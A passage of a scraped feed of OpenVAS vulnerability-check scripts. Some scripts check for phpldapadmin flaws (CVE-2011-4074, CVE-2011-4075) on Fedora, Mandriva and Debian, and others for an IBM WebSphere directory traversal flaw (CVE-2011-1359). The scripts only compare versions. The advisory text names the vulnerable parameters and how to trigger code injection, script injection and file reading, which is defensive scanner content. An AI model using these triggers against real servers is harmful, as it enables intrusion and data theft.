\"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpldapadmin\", rpm:\"phpldapadmin~1.2.1.1~2.20111006git.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:55:19", "description": "Check for the Version of phpldapadmin", "cvss3": {}, "published": "2011-11-25T00:00:00", "type": "openvas", "title": "Fedora Update for phpldapadmin FEDORA-2011-14993", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:863637", "href": "http://plugins.openvas.org/nasl.php?oid=863637", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpldapadmin FEDORA-2011-14993\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PhpLDAPadmin is a web-based LDAP client.\n It provides easy, anywhere-accessible, multi-language administration\n for your LDAP server. 
Its hierarchical tree-viewer and advanced search\n functionality make it intuitive to browse and administer your LDAP directory.\n\n Since it is a web application, this LDAP browser works on many platforms,\n making your LDAP server easily manageable from any location.\n \n PhpLDAPadmin is the perfect LDAP browser for the LDAP professional\n and novice alike. Its user base consists mostly of LDAP administration\n professionals.\n \n Edit /etc/phpldapadmin/config.php to change default (localhost) LDAP server\n location and other things. Edit /etc/httpd/conf.d/phpldapadmin.conf to allow\n access by remote web-clients.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"phpldapadmin on Fedora 15\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-November/069777.html\");\n script_id(863637);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-25 11:58:32 +0530 (Fri, 25 Nov 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2011-14993\");\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_name(\"Fedora Update for phpldapadmin FEDORA-2011-14993\");\n\n script_summary(\"Check for the Version of phpldapadmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", 
value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpldapadmin\", rpm:\"phpldapadmin~1.2.1.1~2.20111006git.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:55:52", "description": "Check for the Version of phpldapadmin", "cvss3": {}, "published": "2011-11-03T00:00:00", "type": "openvas", "title": "Mandriva Update for phpldapadmin MDVSA-2011:163 (phpldapadmin)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:831481", "href": "http://plugins.openvas.org/nasl.php?oid=831481", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for phpldapadmin MDVSA-2011:163 (phpldapadmin)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities were discovered and corrected in phpldapadmin:\n\n Input appended to the URL in cmd.php \\(when cmd is set to _debug\\)\n is not properly sanitised before being returned to the user. This can\n be exploited to execute arbitrary HTML and script code in a user's\n browser session in context of an affected site (CVE-2011-4074).\n \n Input passed to the orderby parameter in cmd.php \\(when cmd is set\n to query_engine, query is set to none, and search is set to e.g. 1\\)\n is not properly sanitised in lib/functions.php before being used in\n a create_function() function call. 
This can be exploited to inject\n and execute arbitrary PHP code (CVE-2011-4075).\n \n The updated packages have been upgraded to the latest version (1.2.2)\n which is not vulnerable to these issues.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"phpldapadmin on Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2011-11/msg00001.php\");\n script_id(831481);\n script_version(\"$Revision: 6565 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 14:56:06 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-03 12:22:48 +0100 (Thu, 03 Nov 2011)\");\n script_xref(name: \"MDVSA\", value: \"2011:163\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_name(\"Mandriva Update for phpldapadmin MDVSA-2011:163 (phpldapadmin)\");\n\n script_summary(\"Check for the Version of phpldapadmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpldapadmin\", 
rpm:\"phpldapadmin~1.2.2~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:57", "description": "The remote host is missing an update to phpldapadmin\nannounced via advisory DSA 2333-1.", "cvss3": {}, "published": "2012-02-11T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2333-1 (phpldapadmin)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:136141256231070549", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070549", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2333_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2333-1 (phpldapadmin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70549\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-4075\", \"CVE-2011-4074\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-11 02:27:28 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2333-1 (phpldapadmin)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(5|6)\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202333-1\");\n script_tag(name:\"insight\", value:\"Two vulnerabilities have been discovered in phpldapadmin, a web based\ninterface for administering LDAP servers. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2011-4074\n\nInput appended to the URL in cmd.php (when cmd is set to _debug) is\nnot properly sanitised before being returned to the user. 
This can be\nexploited to execute arbitrary HTML and script code in a user's browser\nsession in context of an affected site.\n\nCVE-2011-4075\n\nInput passed to the orderby parameter in cmd.php (when cmd is set to\nquery_engine, query is set to none, and search is set to e.g.\n1) is not properly sanitised in lib/functions.php before being used in a\ncreate_function() function call. This can be exploited to inject and\nexecute arbitrary PHP code.\n\n\nFor the oldstable distribution (lenny), these problems have been fixed in\nversion 1.1.0.5-6+lenny2.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion 1.2.0.5-2+squeeze1.\n\nFor the testing distribution (wheezy), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.2.0.5-2.1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your phpldapadmin packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to phpldapadmin\nannounced via advisory DSA 2333-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"phpldapadmin\", ver:\"1.1.0.5-6+lenny2\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"phpldapadmin\", ver:\"1.2.0.5-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:46", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-11-03T00:00:00", "type": "openvas", "title": "Mandriva Update for phpldapadmin MDVSA-2011:163 (phpldapadmin)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": 
["CVE-2011-4074", "CVE-2011-4075"], "modified": "2019-03-12T00:00:00", "id": "OPENVAS:1361412562310831481", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831481", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for phpldapadmin MDVSA-2011:163 (phpldapadmin)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.mandriva.com/security-announce/2011-11/msg00001.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831481\");\n script_version(\"$Revision: 14114 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-12 12:48:52 +0100 (Tue, 12 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-03 12:22:48 +0100 (Thu, 03 Nov 2011)\");\n script_xref(name:\"MDVSA\", value:\"2011:163\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_name(\"Mandriva Update for phpldapadmin MDVSA-2011:163 (phpldapadmin)\");\n\n 
script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpldapadmin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_mes5\");\n script_tag(name:\"affected\", value:\"phpldapadmin on Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities was discovered and corrected in phpldapadmin:\n\n Input appended to the URL in cmd.php \\(when cmd is set to _debug\\)\n is not properly sanitised before being returned to the user. This can\n be exploited to execute arbitrary HTML and script code in a user's\n browser session in context of an affected site (CVE-2011-4074).\n\n Input passed to the orderby parameter in cmd.php \\(when cmd is set\n to query_engine, query is set to none, and search is set to e.g. 1\\)\n is not properly sanitised in lib/functions.php before being used in\n a create_function() function call. 
This can be exploited to inject\n and execute arbitrary PHP code (CVE-2011-4075).\n\n The updated packages have been upgraded to the latest version (1.2.2)\n which is not vulnerable to these issues.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpldapadmin\", rpm:\"phpldapadmin~1.2.2~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:50:27", "description": "The remote host is missing an update to phpldapadmin\nannounced via advisory DSA 2333-1.", "cvss3": {}, "published": "2012-02-11T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2333-1 (phpldapadmin)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:70549", "href": "http://plugins.openvas.org/nasl.php?oid=70549", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2333_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2333-1 (phpldapadmin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Two vulnerabilities have been discovered in phpldapadmin, a web based\ninterface for administering LDAP servers. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2011-4074\n\nInput appended to the URL in cmd.php (when cmd is set to _debug) is\nnot properly sanitised before being returned to the user. This can be\nexploited to execute arbitrary HTML and script code in a user's browser\nsession in context of an affected site.\n\nCVE-2011-4075\n\nInput passed to the orderby parameter in cmd.php (when cmd is set to\nquery_engine, query is set to none, and search is set to e.g.\n1) is not properly sanitised in lib/functions.php before being used in a\ncreate_function() function call. 
This can be exploited to inject and\nexecute arbitrary PHP code.\n\n\nFor the oldstable distribution (lenny), these problems have been fixed in\nversion 1.1.0.5-6+lenny2.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion 1.2.0.5-2+squeeze1.\n\nFor the testing distribution (wheezy), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.2.0.5-2.1.\n\nWe recommend that you upgrade your phpldapadmin packages.\";\ntag_summary = \"The remote host is missing an update to phpldapadmin\nannounced via advisory DSA 2333-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202333-1\";\n\nif(description)\n{\n script_id(70549);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-4075\", \"CVE-2011-4074\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-11 02:27:28 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2333-1 (phpldapadmin)\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"phpldapadmin\", ver:\"1.1.0.5-6+lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"phpldapadmin\", ver:\"1.2.0.5-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-09-04T14:19:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1359"], "description": "The host is running IBM WebSphere Application Server and is prone\n to directory traversal vulnerability.", "modified": "2017-08-31T00:00:00", "published": "2011-09-09T00:00:00", "id": "OPENVAS:801977", "href": "http://plugins.openvas.org/nasl.php?oid=801977", "type": "openvas", "title": "IBM WebSphere Application Server Administration Directory Traversal Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ibm_was_admin_console_dir_trav_vuln.nasl 7029 2017-08-31 11:51:40Z teissa $\n#\n# IBM WebSphere Application Server Administration Directory Traversal Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This 
program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attackers to read arbitrary files on the\n affected application and obtain sensitive information that may lead to\n further attacks.\n Impact Level: Application\";\ntag_affected = \"IBM WebSphere Application Server versions 6.1 before 6.1.0.41,\n 7.0 before 7.0.0.19 and 8.0 before 8.0.0.1\";\ntag_insight = \"The flaw is due to error in administration console which fails to\n handle certain requests. 
This allows remote attackers to read arbitrary\n files via a '../' (dot dot) in the URI.\";\ntag_solution = \"Upgrade IBM WebSphere Application Server to 6.1.0.41 or 7.0.0.19 or\n 8.0.0.1\n For updates refer to http://www-01.ibm.com/support/docview.wss?uid=swg24028875\";\ntag_summary = \"The host is running IBM WebSphere Application Server and is prone\n to directory traversal vulnerability.\";\n\nif(description)\n{\n script_id(801977);\n script_version(\"$Revision: 7029 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-31 13:51:40 +0200 (Thu, 31 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-09 17:36:48 +0200 (Fri, 09 Sep 2011)\");\n script_cve_id(\"CVE-2011-1359\");\n script_bugtraq_id(49362);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"IBM WebSphere Application Server Administration Directory Traversal Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/45749\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/69473\");\n script_xref(name : \"URL\" , value : \"http://www-01.ibm.com/support/docview.wss?uid=swg21509257\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"gb_ibm_websphere_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\ninclude(\"host_details.inc\");\n\nCPE = 
'cpe:/a:ibm:websphere_application_server';\n\nif( ! vers = get_app_version( cpe:CPE, nofork:TRUE ) ) exit( 0 );\n\n## Check for IBM WebSphere Application Server versions\nif(version_is_equal(version: vers, test_version:\"8.0.0.0\") ||\n version_in_range(version: vers, test_version: \"6.1\", test_version2: \"6.1.0.40\") ||\n version_in_range(version: vers, test_version: \"7.0\", test_version2: \"7.0.0.18\")){\n report = report_fixed_ver( installed_version:vers, fixed_version:'6.1.0.41/7.0.0.19' );\n security_message(port:0, data:report);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:39:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1359"], "description": "The host is running IBM WebSphere Application Server and is prone\n to directory traversal vulnerability.", "modified": "2019-02-21T00:00:00", "published": "2011-09-09T00:00:00", "id": "OPENVAS:1361412562310801977", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801977", "type": "openvas", "title": "IBM WebSphere Application Server Administration Directory Traversal Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ibm_was_admin_console_dir_trav_vuln.nasl 13803 2019-02-21 08:24:24Z cfischer $\n#\n# IBM WebSphere Application Server Administration Directory Traversal Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801977\");\n script_version(\"$Revision: 13803 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-21 09:24:24 +0100 (Thu, 21 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-09 17:36:48 +0200 (Fri, 09 Sep 2011)\");\n script_cve_id(\"CVE-2011-1359\");\n script_bugtraq_id(49362);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"IBM WebSphere Application Server Administration Directory Traversal Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"gb_ibm_websphere_detect.nasl\");\n script_mandatory_keys(\"ibm_websphere_application_server/installed\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/45749\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/69473\");\n script_xref(name:\"URL\", value:\"http://www-01.ibm.com/support/docview.wss?uid=swg21509257\");\n script_xref(name:\"URL\", value:\"http://www-01.ibm.com/support/docview.wss?uid=swg24028875\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to read arbitrary files on the\n affected application and obtain sensitive information that may lead to further attacks.\");\n\n script_tag(name:\"affected\", value:\"IBM WebSphere Application Server versions 6.1 before 
